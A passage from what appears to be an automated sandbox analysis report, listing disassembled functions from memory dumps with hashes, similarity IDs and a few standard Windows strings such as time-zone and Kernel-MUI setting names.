                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                      • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                      • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                      • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AD07AC, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACF8CC, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                      • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                      • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                      • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACF938, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                      • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                      • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                      • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AD1930, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                      • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                      • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                      • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFAB8, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                      • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                      • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                      • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFA20, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                      • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                      • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                      • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFA50, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                      • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                      • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                      • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFBE8, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                      • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                      • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                      • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFB50, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFC30, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                      • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                      • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                      • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFC48, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                      • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                      • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                      • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AD0C40, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                      • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                      • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                      • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AD1D80, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                      • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                      • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                      • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFD5C, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                      • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                      • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                      • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFE24, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                      • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                      • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                      • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFFFC, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                      • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                      • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                      • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFF34, Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                      • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                      • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                      • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AF8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • Kernel-MUI-Number-Allowed, xrefs: 00AF87E6
                                      • Kernel-MUI-Language-Allowed, xrefs: 00AF8827
                                      • Kernel-MUI-Language-SKU, xrefs: 00AF89FC
                                      • Kernel-MUI-Language-Disallowed, xrefs: 00AF8914
                                      • WindowsExcludedProcs, xrefs: 00AF87C1
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: _wcspbrk
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 402402107-258546922
                                      • Opcode ID: 467db9de27376aaeb32e9e302d17db325c8eea333dd868a161f7fe90ec422136
                                      • Instruction ID: 5d767139f74d7be157c1bd0fb3527aa856e027e2c15ccd0644b7a8f30bfae5aa
                                      • Opcode Fuzzy Hash: 467db9de27376aaeb32e9e302d17db325c8eea333dd868a161f7fe90ec422136
                                      • Instruction Fuzzy Hash: 03F1D5B2D00249EFCF11EFD9CA819EEB7B9FB08304F15446AF606A7211EB359A45DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B6822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: _wcsnlen
                                      • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                      • API String ID: 3628947076-1387797911
                                      • Opcode ID: dc51bc62b67d4b134f87cef44e56c2900db7057ea83137b35a8b65bf55498c85
                                      • Instruction ID: 46fda3354ee8204a6314435fbf0eacb7a53dc21debc32db52e4460694b2673ea
                                      • Opcode Fuzzy Hash: dc51bc62b67d4b134f87cef44e56c2900db7057ea83137b35a8b65bf55498c85
                                      • Instruction Fuzzy Hash: B341A875240219BAEB119A90DC82FDE77ECEF09B44F1042A2BA04E5191DFB4DB5197A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B113CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
